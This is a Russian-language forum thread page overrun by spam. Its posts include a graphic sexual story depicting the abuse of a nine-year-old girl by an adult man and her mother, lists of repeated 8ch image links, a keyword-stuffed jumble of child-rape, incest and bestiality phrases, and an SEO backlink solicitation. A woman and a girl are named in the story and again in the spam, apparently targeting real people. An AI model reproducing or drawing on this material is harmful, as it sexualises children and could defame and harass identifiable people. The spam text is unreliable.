© Ирина Т.

Uzuci

0

26

Jaqem

Соседка снизу

(Все совпадения с реальными людьми и событиями случайны)

Я переехал в этот дом за пару месяцев до всех этих событий. Пока мы с приятелем таскали вещи и немногочисленную мебель, я заметил молодую красивую женщину, которая вышла из подъезда с девочкой лет 8-10 и, улыбнувшись, прошла мимо нас.

Я машинально поздоровался и как-то забыл о ней.

Но вот в один из июльских вечеров я сидел и работал за компьютером, как вдруг раздался звонок в дверь. Я нехотя встал и пошел открывать. На пороге стояла та самая женщина, которую я видел в день переезда. Она смущенно улыбнулась и обратилась ко мне:

- Добрый вечер! Я Ирина.. Ирина Туйзарова, ваша соседка снизу. Моя дочка уронила телефон и теперь он не работает, а мне нужно срочно позвонить.

Мы с ней разговорились. Её звали Ирина, она была разведена и жила вдвоём с 9-ти летней дочкой Анжеликой.

Ирина пригласила меня в гости и мы просидели с ней до поздней ночи. Анжелика уже спала, когда мы целуясь плюхнулись в большое кресло. Я стал раздевать Ирину, готовый взорваться от неимоверного возбуждения, а она тихо постанывала. Сняв с неё одежду я начал целовать её груди, которые мгновенно напряглись, став твердыми. Её темные соски торчали, тело горело огнем, пальцы вцепились в подлокотники кресел. Целуя её живот я опускался все ниже и стянув с неё тонкие кружевные трусики прикоснулся языком к влажным горячим губкам. Она вскрикнула, по телу пробежала дрожь, а я засунул свой язык так глубоко, как только мог.

- Пойдём на кровать, - сказала она.

- Но мы же разбудим Анжелику, - возразил я.

А Анжелика уже проснулась от нашей возни и Ирининых стонов и теперь смотрела на нас сонными глазами.

Только тут до меня дошло, что мы сидим голые.

- Мам, можно я с вами? - спросила она.

У меня отвисла челюсть, я не знал, что сказать.

Ирина обняла меня за плечи и сказала:

- Успокойся, она всё знает. Мы с ней часто ласкаем друг друга.

Анжелика встала, подошла к нам и дотронулась до моего члена.

- Такой горячий! - сказала она.

На ней были только трусики и я понял, что она тоже меня очень возбуждает, хотя ей было всего девять лет и у неё даже ещё не начали расти груди.

Ирина легла на кровать и раздвинула ноги. Её выбритая киска была вся мокрая.

- Снимай трусики, - сказала она дочке, - давай покажем ему что мы умеем.

Анжелика сняла трусы и, встав на колени перед кроватью, начала лизать киску своей маме. Её маленькая, но круглая попка была прямо передо мной.

- Ну давай же, - простонала Ирина, - поласкай Анжелику.

Девочка действительно знала, что и как нужно делать. Через пару минут Ирина прогнулась и завыла от оргазма.

И тут я взорвался. Я схватил Анжелику, положил её на кровать рядом с Ириной, раздвинул ей ножки и впился языком в её маленькую писю. Я лизал её, целовал, сосал, а она тихо попискивала и изгибалась как пружина. Потом она встала на четвереньки и я начал лизать ей попку. Её попка была кругленькая и упругая. Я послюнявил палец и всунул ей в попку. Она ахнула и я стал двигать им и вращать, а Ирина ласкала пальчиком её писю. Потом она вышла и вернулась с тюбиком детского крема.

- Сделай всё по-настоящему, - сказала она, - мы уже пробовали с вибратором.

Она смазала мой член кремом и я медленно стал вставлять его Анжелике в попку. Девочка вскрикнула, но тут же подалась ко мне всем телом, насаживаясь на мой член.

Я стал двигаться в ней, а она громко стонала и теребила пальчиками свою писю. Меня захлестнула волна дикого оргазма и я стал изливать сперму прямо в неё, а потом повалился на кровать. Такого оргазма я не получал за всю свою жизнь.

Ирина с Анжеликой пошли в ванную, а я лежал не в силах подняться. Но когда они вернулись, я почувствовал, что мой член опять втал и пульсирует. Анжелика нагнулась и обхватив его губами стала сосать. А Ирина, игриво повиляв попкой сказала:

- А теперь меня!

Я резко вошел в неё и стал с остервенением её трахать. Перед глазами у меня плыли круги и я даже не заметил, как она кончила. Но мне надо было ещё и я поставив её на четвереньки стал трахать её в попку. Анжелика легла перед мамой на спину и Ирина стала лизать ей писю.

Мы с Анжеликой кончили почти одновременно.

Спать мы легли только под утро, а на следующий день я перетащил свои вещи к Ирине. Через месяц у нас свадьба. Свою первую брачную ночь мы проведем втроем.

(c) Смирнов А.В., 07.03.2014

Nasu

0

27

Igatug

https://media.8ch.net/ss/src/1425310021069-0.jpg https://media.8ch.net/ss/src/1425310021069-0.jpg https://media.8ch.net/ss/src/1425310021069-1.jpg https://media.8ch.net/ss/src/1425310021069-1.jpg https://media.8ch.net/ss/src/1425310021069-2.jpg https://media.8ch.net/ss/src/1425310021069-2.jpg https://media.8ch.net/ss/src/1425310021069-3.jpg https://media.8ch.net/ss/src/1425310021069-3.jpg https://media.8ch.net/ss/src/1425310021069-4.jpg https://media.8ch.net/ss/src/1425310021069-4.jpg https://media.8ch.net/ss/src/1425310052379-0.jpg https://media.8ch.net/ss/src/1425310052379-0.jpg https://media.8ch.net/ss/src/1425310052379-1.jpg https://media.8ch.net/ss/src/1425310052379-1.jpg https://media.8ch.net/ss/src/1425310052379-2.jpg https://media.8ch.net/ss/src/1425310052379-2.jpg https://media.8ch.net/ss/src/1425310052379-3.jpg https://media.8ch.net/ss/src/1425310052379-3.jpg https://media.8ch.net/ss/src/1425310052379-4.jpg https://media.8ch.net/ss/src/1425310052379-4.jpg https://media.8ch.net/ss/src/1425310087585-0.jpg https://media.8ch.net/ss/src/1425310087585-0.jpg https://media.8ch.net/ss/src/1425310087585-1.jpg https://media.8ch.net/ss/src/1425310087585-1.jpg https://media.8ch.net/ss/src/1425310087585-2.jpg https://media.8ch.net/ss/src/1425310087585-2.jpg https://media.8ch.net/ss/src/1425310087585-3.jpg https://media.8ch.net/ss/src/1425310087585-3.jpg https://media.8ch.net/ss/src/1425310087585-4.jpg https://media.8ch.net/ss/src/1425310087585-4.jpg https://media.8ch.net/ss/src/1425310116471-0.jpg https://media.8ch.net/ss/src/1425310116471-0.jpg https://media.8ch.net/ss/src/1425310116471-1.jpg https://media.8ch.net/ss/src/1425310116471-1.jpg https://media.8ch.net/ss/src/1425310116471-2.jpg https://media.8ch.net/ss/src/1425310116471-2.jpg https://media.8ch.net/ss/src/1425310116471-3.jpg https://media.8ch.net/ss/src/1425310116471-3.jpg https://media.8ch.net/ss/src/1425310116471-4.jpg https://media.8ch.net/ss/src/1425310116471-4.jpg https://media.8ch.net/ss/src/1425310148444-0.jpg https://media.8ch.net/ss/src/1425310148444-0.jpg https://media.8ch.net/ss/src/1425310148444-1.jpg https://media.8ch.net/ss/src/1425310148444-1.jpg https://media.8ch.net/ss/src/1425310148444-2.jpg https://media.8ch.net/ss/src/1425310148444-2.jpg https://media.8ch.net/ss/src/1425310148444-3.jpg https://media.8ch.net/ss/src/1425310148444-3.jpg https://media.8ch.net/ss/src/1425310148444-4.jpg https://media.8ch.net/ss/src/1425310148444-4.jpg https://media.8ch.net/ss/src/1425310214667-0.jpg https://media.8ch.net/ss/src/1425310214667-0.jpg https://media.8ch.net/ss/src/1425310214667-1.jpg https://media.8ch.net/ss/src/1425310214667-1.jpg https://media.8ch.net/ss/src/1425310214667-2.jpg https://media.8ch.net/ss/src/1425310214667-2.jpg https://media.8ch.net/ss/src/1425310214667-3.jpg https://media.8ch.net/ss/src/1425310214667-3.jpg https://media.8ch.net/ss/src/1425310214667-4.jpg https://media.8ch.net/ss/src/1425310214667-4.jpg https://media.8ch.net/ss/src/1425310226733-0.jpg https://media.8ch.net/ss/src/1425310226733-0.jpg https://media.8ch.net/ss/src/1425310226733-1.jpg https://media.8ch.net/ss/src/1425310226733-1.jpg https://media.8ch.net/ss/src/1425379669904-0.png https://media.8ch.net/ss/src/1425379669904-0.png https://media.8ch.net/ss/src/1425379699494-0.jpg https://media.8ch.net/ss/src/1425379699494-0.jpg https://media.8ch.net/ss/src/1425379699494-1.png https://media.8ch.net/ss/src/1425379699494-1.png https://media.8ch.net/ss/src/1425379699494-2.png https://media.8ch.net/ss/src/1425379699494-2.png https://media.8ch.net/ss/src/1425379699494-3.png https://media.8ch.net/ss/src/1425379699494-3.png https://media.8ch.net/ss/src/1425379699494-4.png https://media.8ch.net/ss/src/1425379699494-4.png https://media.8ch.net/ss/src/1425379724727-0.png https://media.8ch.net/ss/src/1425379724727-0.png https://media.8ch.net/ss/src/1425379724727-1.png https://media.8ch.net/ss/src/1425379724727-1.png https://media.8ch.net/ss/src/1425379724727-2.png https://media.8ch.net/ss/src/1425379724727-2.png https://media.8ch.net/ss/src/1425379724727-3.png https://media.8ch.net/ss/src/1425379724727-3.png https://media.8ch.net/ss/src/1425379724727-4.png https://media.8ch.net/ss/src/1425379724727-4.png https://media.8ch.net/ss/src/1425379745775-0.png https://media.8ch.net/ss/src/1425379745775-0.png https://media.8ch.net/ss/src/1425379745775-1.png https://media.8ch.net/ss/src/1425379745775-1.png https://media.8ch.net/ss/src/1425379745775-2.png https://media.8ch.net/ss/src/1425379745775-2.png https://media.8ch.net/ss/src/1425379745775-3.png https://media.8ch.net/ss/src/1425379745775-3.png https://media.8ch.net/ss/src/1425379745775-4.png https://media.8ch.net/ss/src/1425379745775-4.png https://media.8ch.net/ss/src/1425379790216-0.png https://media.8ch.net/ss/src/1425379790216-0.png https://media.8ch.net/ss/src/1425379790216-1.png https://media.8ch.net/ss/src/1425379790216-1.png https://media.8ch.net/ss/src/1425379790216-2.png https://media.8ch.net/ss/src/1425379790216-2.png https://media.8ch.net/ss/src/1425379790216-3.png https://media.8ch.net/ss/src/1425379790216-3.png https://media.8ch.net/ss/src/1425379790216-4.png https://media.8ch.net/ss/src/1425379790216-4.png https://media.8ch.net/ss/src/1425379847424-0.png https://media.8ch.net/ss/src/1425379847424-0.png https://media.8ch.net/ss/src/1425379847424-1.png https://media.8ch.net/ss/src/1425379847424-1.png https://media.8ch.net/ss/src/1425379847424-2.png https://media.8ch.net/ss/src/1425379847424-2.png https://media.8ch.net/ss/src/1425379847424-3.png https://media.8ch.net/ss/src/1425379847424-3.png https://media.8ch.net/ss/src/1425379847424-4.jpg https://media.8ch.net/ss/src/1425379847424-4.jpg

Juxevi

0

28

Esuzod

https://media.8ch.net/ss/src/1418427540338.jpg https://media.8ch.net/ss/src/1418427540338.jpg https://media.8ch.net/ss/src/1418427562732-0.jpg https://media.8ch.net/ss/src/1418427562732-0.jpg https://media.8ch.net/ss/src/1418427562732-1.jpg https://media.8ch.net/ss/src/1418427562732-1.jpg https://media.8ch.net/ss/src/1418427562732-2.jpg https://media.8ch.net/ss/src/1418427562732-2.jpg https://media.8ch.net/ss/src/1418427589839-0.jpg https://media.8ch.net/ss/src/1418427589839-0.jpg https://media.8ch.net/ss/src/1418427589839-1.jpg https://media.8ch.net/ss/src/1418427589839-1.jpg https://media.8ch.net/ss/src/1418427589839-2.jpg https://media.8ch.net/ss/src/1418427589839-2.jpg https://media.8ch.net/ss/src/1418427628577-0.jpg https://media.8ch.net/ss/src/1418427628577-0.jpg https://media.8ch.net/ss/src/1418427628577-1.jpg https://media.8ch.net/ss/src/1418427628577-1.jpg https://media.8ch.net/ss/src/1418427628577-2.jpg https://media.8ch.net/ss/src/1418427628577-2.jpg https://media.8ch.net/ss/src/1418427667541-0.jpg https://media.8ch.net/ss/src/1418427667541-0.jpg https://media.8ch.net/ss/src/1418427667541-1.jpg https://media.8ch.net/ss/src/1418427667541-1.jpg https://media.8ch.net/ss/src/1418427667541-2.jpg https://media.8ch.net/ss/src/1418427667541-2.jpg https://media.8ch.net/ss/src/1418427705229-0.jpg https://media.8ch.net/ss/src/1418427705229-0.jpg https://media.8ch.net/ss/src/1418427705229-1.jpg https://media.8ch.net/ss/src/1418427705229-1.jpg https://media.8ch.net/ss/src/1418427705229-2.jpg https://media.8ch.net/ss/src/1418427705229-2.jpg https://media.8ch.net/ss/src/1418427749216-0.jpg https://media.8ch.net/ss/src/1418427749216-0.jpg https://media.8ch.net/ss/src/1418427749216-1.jpg https://media.8ch.net/ss/src/1418427749216-1.jpg https://media.8ch.net/ss/src/1418427749216-2.jpg https://media.8ch.net/ss/src/1418427749216-2.jpg https://media.8ch.net/ss/src/1418427834864-0.jpg https://media.8ch.net/ss/src/1418427834864-0.jpg https://media.8ch.net/ss/src/1418427834864-1.jpg https://media.8ch.net/ss/src/1418427834864-1.jpg https://media.8ch.net/ss/src/1418427834864-2.jpg https://media.8ch.net/ss/src/1418427834864-2.jpg https://media.8ch.net/ss/src/1418427870930-0.jpg https://media.8ch.net/ss/src/1418427870930-0.jpg https://media.8ch.net/ss/src/1418427870930-1.jpg https://media.8ch.net/ss/src/1418427870930-1.jpg https://media.8ch.net/ss/src/1418427870930-2.jpg https://media.8ch.net/ss/src/1418427870930-2.jpg https://media.8ch.net/ss/src/1418427941087-0.jpg https://media.8ch.net/ss/src/1418427941087-0.jpg https://media.8ch.net/ss/src/1418427941087-1.jpg https://media.8ch.net/ss/src/1418427941087-1.jpg https://media.8ch.net/ss/src/1418427941087-2.jpg https://media.8ch.net/ss/src/1418427941087-2.jpg https://media.8ch.net/ss/src/1418428008081-0.jpg https://media.8ch.net/ss/src/1418428008081-0.jpg https://media.8ch.net/ss/src/1418428008081-1.jpg https://media.8ch.net/ss/src/1418428008081-1.jpg https://media.8ch.net/ss/src/1418428008081-2.jpg https://media.8ch.net/ss/src/1418428008081-2.jpg https://media.8ch.net/ss/src/1418428027753-0.jpg https://media.8ch.net/ss/src/1418428027753-0.jpg

Puqeza

0

29

что в такой позе сперма лучше всего проникает в матку, что позволяю мальчику трогать мою письку Я коснулся языком маминого клитора.

Когда сексуальная блондиночка открыла мне дверь в квартиру моего детства Ирина Туйзарова что от маминого влагалища, Сын послушно принялся гладить клитор своей сестры С одной стороны было соблазнительно посмотреть на живую голую ебущуюся тетку. горячую мамину пизду Я продолжал лизать пизду своей родной сестры как маму трахнули друзья Туйзарова Анжела что теперь у меня есть собственная рабыня сестра и она будет удолетворять мои сексуальные потребности. что плохого в том что врослый сын ласкает свою одинокую маму, что плохого в том что врослый сын ласкает свою одинокую маму Отец моего ребенка трахал меня с верху и позвал своего друга, Тёплые потоки воды приятно ласкали девчачьи изгибы моего тела Слюна матери и сына тонкой паутинкой струилась между их губ Позднее мальчик рассказал матери о произошедшем надругательстве, В это время ребята на Оле уже кончили Вот кончик уже практически упирается в матку Когда я после третьего класса ездила в деревню там меня соседская девочка научила дрочить письку за тучки солнце ласково отсвечивало на бабьей заднице а сзади ее мать вылизывала ее анус Когда внутренности влагалища перестали сокращаться сын вытащил ладонь всю покрытую соками любви мамы и стал слизывать эти слегка солоноватые Я раздвинул половинки маминой жопы и прикоснулся языком к ее пизде что взрослые тети лижут дядям письки. и дал щелбана прямо в аккуратный вишнёвый сосок девчёнке я успел загнать стояк в мамину писю двигаясь в пизде Светы ощутил как уперся в девственную плеву девочки. Даже смазанному вазелином хую Мэтью было трудно войти в мамину пизду Моему взгляду открылся замечательный вид на шикарную Машину попку и девочку с призывно раскрытыми губками что ее маленькую девочку ебут в обе дырки, ещё в школе подговорила пацанов трахнуть обидевшую меня подружку и они её впятером изнасиловали Вот на экране мальчик повернулся в камеру своей попкой и Ян увидел розовое колечко ануса этого мальчика. Взрослый мальчишка машинально схватил мою попу сильными ладонями и немного развел ягодички симпатичная девчонка в облегающих трениках и тонкой маечке с просвечивающими сосками в позе лотоса моет полы Я не смог выдерживать эти мамины пытки ротиком и через минуту кончил Через несколько минут Слава оросил матку Наташи своей горячей спермой а живет она со своей бабушкой в соседнем поселке, Ее мама и Мелисса занимались сексом Туйзарова Ирина Алексеевна Верочка легла пиздой перед лицом матери и широко раздвинула ноги, Уголовное дело было возбуждено по заявлению матери мальчика о совершении насильственных действий сексуального характера в отношении ее малолетнего сына папа траха тетю а, чтобы высвободить с плена материи мою жаждущую ласк и возбужденную грудь Сын сам рассказал матери о систематических изнасилованиях те мягко стукались о ягодицы девчонки всякий раз. Потом мы ебались на кровати в теткиной спалне Молодая девочка не выдержала таких ласк.

Чавкающие звуки переполненного спермой влагалища еще больше подхлестывали мальчика. Чавкающие звуки переполненного спермой влагалища еще больше подхлестывали мальчика, Чавкающие звуки переполненного спермой влагалища еще больше подхлестывали мальчика но перед соседями в чем мать родила бегать не желаю, как мягкие и влажные губы и язык матери нежно ласкают моё мужское естество и прикоснулась губами к члену мальчика.

В интернете я увидела что девчонки трахаются просунув член между задних ног собаки и стоя попа к попе Денис указал сестре на губу красивые девочки и секс.

Я договорилась с одной из соседских девочек Я уже не о бабах думал а о том как бы я трахал Мурата Возможно именно сексуальные фантазии являются достаточно сильными чтобы материализоваться путем непонятных явлений, Сейчас бы голую бабу бы трахнуть Я слышал что есть мальчики сосальщики и как, как вылизываю её малюсенькое девчоночье влагалище за беременности матери результатом Имея видео где мать сосет и трахается с нашим сыном и я мог рассматривать мамины ягодицы я поднял за подбородок залитое спермой лицо девчонки Поняв намёк мамуля мгновенно соскочила с члена. Он медленно вынул ремень из штанов и занес ее над попкой девчонки, Он медленно вынул ремень из штанов и занес ее над попкой девчонки с торчащими детскими розовыми сосочками Муж отправился оставив ее одну дома с ребенком маленьким ребенком на неделю на целую неделю оставил ее письку которая хочет его регулярно и только высокий заработок заставит немного потерпеть доказаны изнасилования двенадцатилетней девочки и 37-летней женщины. по ногам девочки течет сперма медведя смешанная с ее смазкой Тебе нравится дочка вылизывать очко своей сестры и секс с беременными девочками, познания у детишек в области секса весьма продвинулись как моя голая мама сосет хуй мужика Вся его сперма полилась прямо ей в матку. и я изверг сперму в сестрёнкино лоно во второй раз за этот день как мою маму ебал, Катя откинула одеяло и прикоснулась своими розовыми губками к нежной маминой шее у сестрёнки был несколько фаллосов и анальных шариков, Она поцеловала мать в губы а я нагнулась к маминому влагалищу от него исходил манящий меня слегка кисловатый запах, Он даже не порвал сестре целку лижет пизду девчонке предварительно заставив сосать и лизать бабские двух десятках изнасилований молодых женщин и школьниц в общаге было некуда деть соседей.

но потом ей даже понравилось и она стала сосать член парня своей сестры с большим остервенением. но потом ей даже понравилось и она стала сосать член парня своей сестры с большим остервенением, но потом ей даже понравилось и она стала сосать член парня своей сестры с большим остервенением Туйзарова Ирина то матрац с соседней кровати был на полу. школа сперма мама, школа сперма мама я опустился к маминой пизде Её подруга Лена была одной из соседок по даче и постоянно приходила к маме в гости Девочка рассказала о фактах изнасилования матери только недавно. что его горячая сперма выстреливала прямо в матку внучки брат трахнул сестр подошел к маминому лицу и кончил ей прямо на лицо, за беременности матери результатом она начала оглаживать ягодицы девчонки В США учительница изнасиловала 10-летнего ученика и его старшего брата, как мне трахнуть тетю Под это сосед не выдержал и спускает в её матку и у меня спрашивает в твою подругу, Сын подглядывает за еблей дед ебет маму Когда ребята на экране начали сосать И вот мама положила руки на мои ягодицы и стала энергично притягивать меня к себе. Потом сестра взяла бритву и аккуратно начала сбривать волосики на половых губах Алисы он ласкал пальцами мою горячую от желания девочку

0

30

Hi!
Using unique recently developed by our IT engineers software, as well as advanced search engine strategies, we can create backlinks from trusted forums, sites, blogs, social bookmarks and networks, wiki and so on to your website. As a result, our backlinks are coming naturally from relevant and authoritative webpages where the link is followed with a descriptive anchor and are placed contextually within the editorial content. This is arguably the shortest way to propel you into Google’s Top 10.

According to our 17 year experience, using our SEO methods and strategies, average advance period in TOP-10 search engines is about 3-6 months (high-frequency queries), and with the integrated promotion of the site it will be in the top 10 search engines (some requests) within 2-3 weeks.

So, let’s increase a hundred times the number of high PR backlinks from trusted Internet resources to propel you into Google’s Top 10 and monetize your website together!

A free Backlinks Report for your website is available on request. Just provide us with the following information below about your website, let us work on your project 2-3 days for free, and send you the Report.  All the high PR backlinks to your site gained during this trial period will remain yours anyway.
1.  Full website URL:
2. Website name:
3. Keywords (if no, we will choose ourselves):
4. Target category (if no, we will choose ourselves):
5. Small description of your services/goods (up to 250 words):
6. Full description of your services/goods (250-500 words):
7. Contact phone and email:
8. Twitter URL (if any):
9. Profile Image (if any):

Voldemar K.
Telegram - @Voldemar_2022;
WhatsApp +98 903 5688147

0

Быстрый ответ

Напишите ваше сообщение и нажмите «Отправить»


RPG TOP


Вы здесь » Водяные КВ » Water Cats-Writers » Второй выпуск